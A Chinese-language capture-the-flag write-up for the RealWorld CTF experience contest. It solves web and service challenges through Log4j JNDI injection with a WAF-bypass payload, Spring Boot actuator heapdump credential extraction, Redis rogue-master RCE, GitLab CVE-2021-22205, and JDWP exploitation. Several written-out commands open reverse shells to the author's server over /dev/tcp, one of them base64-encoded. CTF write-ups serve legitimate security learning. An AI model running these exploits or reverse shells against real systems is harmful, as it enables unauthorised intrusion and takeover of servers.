RealWorld CTF体验赛Writeup
前言:
这次比赛的题目是需要nc连上去,然后md5截断比较验证,才会给出题目的端口。爆破脚本参考这篇文章:https://www.cnblogs.com/yesec/p/11297568.html
Check-in
Digital Souvenir
Web
log4flag
进入题目 熟悉的log4j,先输入常规的payload:${jndi:rmi://101.43.66.67:1099/rvosq5}
,密码任意,点击登录,会被waf拦截,提示非法参数值。

网上找了一篇bypass的文章: https://blog.csdn.net/qq_42322144/article/details/121922084
其中一条payload : ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
可以绕过,即:${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://101.43.66.67:1099/rvosq5}
,同时VPS开启监听

拿到flag:
rwctf{d4b4b837f95542aa93b43ee280b230d8}
the Secrets of Memory

进入题目,看到Actuator,联想到Spring Boot,尝试一下Spring Boot常见漏洞,发现存在env接口泄露。访问http://139.196.213.45:32646/actuator/env
搜索password字符

可以看到,数据库源密码就是flag,而这里的值是星号加密了的,脱敏的方法可以访问http://139.196.213.45:32646/actuator/heapdump
下载heapdump内存,通过MAT工具获得脱敏后的值,具体方法详见:https://landgrey.me/blog/16/
用工具打开内存后,点击OQL 标签,在查询框中输入:
select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password"))
即可查询到脱敏后的password 也就是这里的flag

得到flag:
rwcft{d597d5defdd22829d8587efb9f9d0954}
Be-a-Database-Hacker
这题用redis主从复制RCE的洞来打,工具链接:https://github.com/vulhub/redis-rogue-getshell
将工具下载到 VPS上,执行cd RedisModulesSDK/进入RedisModulesSDK目录,然后执行make用来编译exp.so
然后用find命令查找一下flag文件的位置
python3 redis-master.py -r 47.102.124.80 -p 35829 -L 101.43.66.67 -P 12345 -f RedisModulesSDK/exp.so -c "find / -name 'fla*'"

然后直接cat /tmp/flag.txt即可
python3 redis-master.py -r 47.102.124.80 -p 35829 -L 101.43.66.67 -P 12345 -f RedisModulesSDK/exp.so -c "cat /tmp/flag.txt"

得到flag:
rwctf{c4374dba71fbf50144f7a1a04b7f5837}
Be-a-Database-Hacker 2
baby flaglab
进入题目,发现是Gitlab的登陆页面,最近有一个Gitlab的远程命令执行漏洞(CVE-2021-22205),Github上利用工具: https://github.com/Al1ex/CVE-2021-22205
执行命令,将反弹shell的命令写入tmp目录的le1a.sh
python CVE-2021-22205.py -a true -t http://47.102.106.96:34894/ -c "echo 'bash -i >& /dev/tcp/101.43.66.67/12345 0>&1' > /tmp/le1a.sh"
然后将这个bash脚本赋予执行权限
python CVE-2021-22205.py -a true -t http://47.102.106.96:34894/ -c "chmod +x /tmp/le1a.sh"
在自己VPS上开启一个监听,然后执行该脚本即可反弹shell
python CVE-2021-22205.py -a true -t http://47.102.106.96:34894/ -c "chmod +x /tmp/le1a.sh"

得到flag:
rwctf{4edb62cb7b37d647e13bfed4f8d4b860}
Ghost Shiro
工具一把梭,地址:https://github.com/SummerSec/ShiroAttack2/releases

得到flag:
rwctf{1b3df79b3c0e39f5b9f8815914403432}
Flag Console
Java Remote Debugger
JDWP漏洞,参考这个文章:https://www.wangan.com/articles/4255
漏洞利用脚本:https://github.com/IOActive/jdwp-shellifier
VPS开一个监听,然后用python2执行命令:
python2 jdwp-shellifier.py -t 139.196.23.201 -p 8888 --break-on "java.lang.String.indexOf" --cmd "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuNDMuNjYuNjcvMTIzNDUgMD4mMQ==}|{base64,-d}|{bash,-i}"


得到flag:
rwctf{2c0e7100bcb45cc825ca07eccb86e568}